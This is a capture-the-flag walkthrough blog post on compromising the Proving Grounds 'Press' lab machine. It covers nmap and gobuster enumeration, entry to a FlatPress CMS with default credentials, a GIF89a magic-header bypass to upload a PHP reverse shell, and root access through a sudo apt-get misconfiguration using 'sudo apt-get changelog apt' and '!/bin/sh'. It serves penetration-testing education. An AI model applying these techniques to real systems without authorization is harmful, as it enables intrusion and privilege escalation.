PG - Press

PG – Press

In this walk through, we will be going through the Press room from Proving Grounds. This room is rated as Intermediate on the platform and it consist of exploitation of FlatPress CMS using File Upload attacks to get the initial foothold. For the privilege escalation, exploitation of the sudo misconfiguration for the apt-get binary is required to get root. So, let’s get started without any delay.

Press

Machine Info:

TitlePress
IPaddress192.168.169.29
DifficultyIntermediate
OSLinux
DescriptionPress is an Intermediate Linux machine that is running FlatPress CMS on it which can be exploited using File Upload attacks to get the initial foothold. For the privilege escalation, exploitation of the sudo misconfiguration for the apt-get binary is required.

Enumeration:

  • I started off with a regular aggressive nmap scan and found only 3 ports opened – 22 (SSH), 80 (SSH) and 8089 (HTTP).

$ sudo nmap -A 192.168.169.29
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-06 21:20 IST

Nmap scan report for 192.168.169.29
Host is up (0.21s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.4p1: 
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	PRION:CVE-2021-41617	4.4	https://vulners.com/prion/PRION:CVE-2021-41617
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
53/tcp   filtered domain
80/tcp   open     http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Lugx Gaming Shop HTML5 Template
| vulners: 
|   cpe:/a:apache:http_server:2.4.56: 
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	OSV:BIT-APACHE-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|     	OSV:BIT-APACHE-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|     	OSV:BIT-APACHE-2023-31122	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2023-43622	5.0	https://vulners.com/cve/CVE-2023-43622
|     	CVE-2023-31122	5.0	https://vulners.com/cve/CVE-2023-31122
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|     	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
|_    	CVE-2023-45802	2.6	https://vulners.com/cve/CVE-2023-45802
8089/tcp open     http    Apache httpd 2.4.56 ((Debian))
|_http-generator: FlatPress fp-1.2.1
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: FlatPress
| vulners: 
|   cpe:/a:apache:http_server:2.4.56: 
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	OSV:BIT-APACHE-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|     	OSV:BIT-APACHE-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|     	OSV:BIT-APACHE-2023-31122	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2023-43622	5.0	https://vulners.com/cve/CVE-2023-43622
|     	CVE-2023-31122	5.0	https://vulners.com/cve/CVE-2023-31122
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|     	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
|_    	CVE-2023-45802	2.6	https://vulners.com/cve/CVE-2023-45802
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/6%OT=22%CT=1%CU=37943%PV=Y%DS=4%DC=T%G=Y%TM=65C2556B
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=109%TI=Z%II=I%TS=A)SEQ(SP=FD%
OS:GCD=1%ISR=109%TI=Z%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW
OS:7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%
OS:W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1
OS:(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=
OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%U
OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=B10C%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1025/tcp)
HOP RTT       ADDRESS
1   217.57 ms 192.168.45.1
2   213.49 ms 192.168.45.254
3   217.61 ms 192.168.251.1
4   217.86 ms 192.168.169.29

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.44 seconds

nmap scan

port 8089 open

  • Enumerated the web server on port 80 and found a static website related to Gaming. Looked around the different pages on the website but found nothing interesting.

Gaming website

Our Shop

COD MW 2

Contact Us

  • Fired gobuster on the target web server to reveal some hidden directories. Found nothing useful here as well.

$ gobuster dir -u http://192.168.169.29/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.169.29/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html
[+] Timeout:                 10s
===============================================================
2024/02/06 21:25:51 Starting gobuster in directory enumeration mode
===============================================================
/contact.html         (Status: 200) [Size: 6903]
/assets               (Status: 301) [Size: 317] [--> http://192.168.169.29/assets/]
/shop.html            (Status: 200) [Size: 11662]                                  
/index.html           (Status: 200) [Size: 15103]                                  
/vendor               (Status: 301) [Size: 317] [--> http://192.168.169.29/vendor/]
/server-status        (Status: 403) [Size: 279]                                    
/product-details.html (Status: 200) [Size: 9655]                                   
                                                                                   
===============================================================
2024/02/06 21:39:53 Finished
===============================================================

gobuster scan

  • Next, enumerated the web server on port 8089 and found the FlatPress CMS running.

FlatPress CMS

  • Found a login panel on the right sidebar. Used the default login username and password combo and got into the backend of the CMS.

FlatPress CMS login panel

Administration area

Initial Access:

  • Once i landed in the Administration area. The Uploader functionality caught my attention. Next, i tried to upload a normal text file on the target and was able to upload and execute it through it. Nice!

File Upload functionality

Uploader

Media Manager

  • But when i tried to upload a PHP reverse shell using it. It throws an error on my face like below.

Uploader

  • The application Uploader functionality was checking the MIME type information of the uploading file and was discarding those which have PHP set to it. We can easily bypass this by adding the below magic header to it. Now, when our payload file is processed, it will be marked as image/gif instead of PHP due to introduced header.

GIF89a;

reverse shell

  • Using the above technique, i was able to successfully bypass the filtering and then executed the payload to get a reverse connection back.

Files uploaded

got initial access

Privilege Escalation:

  • Executed LinPEAS on the target to enumerate some potential privilege escalation attack vectors and found out that we can run the apt-get binary as root without any password.

sudo -l

  • Next, used the GTFObins exploit for the concerned binary to get root on the target and captured the root flag to mark the machine as complete.

sudo GTFObins exploit

sudo apt-get changelog apt
!/bin/sh

got root

Also Read: PG – Pelican

Conclusion:

Conclusion

So that was “Press” for you. We started off with a regular nmap scan and found 3 ports opened – 22 (SSH), 80 (SSH) and 8089 (HTTP). Enumerated the web server on port 8089 and found the FlatPress CMS running. Found a login panel on the right sidebar. Used the default login username and password combo and got into the backend of the CMS. Once i landed in the Administration area. Uploaded my reverse shell payload and bypassed the filter to get initial foothold on the target. For the privilege escalation, exploitation of the sudo misconfiguration for the apt-get binary was done to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top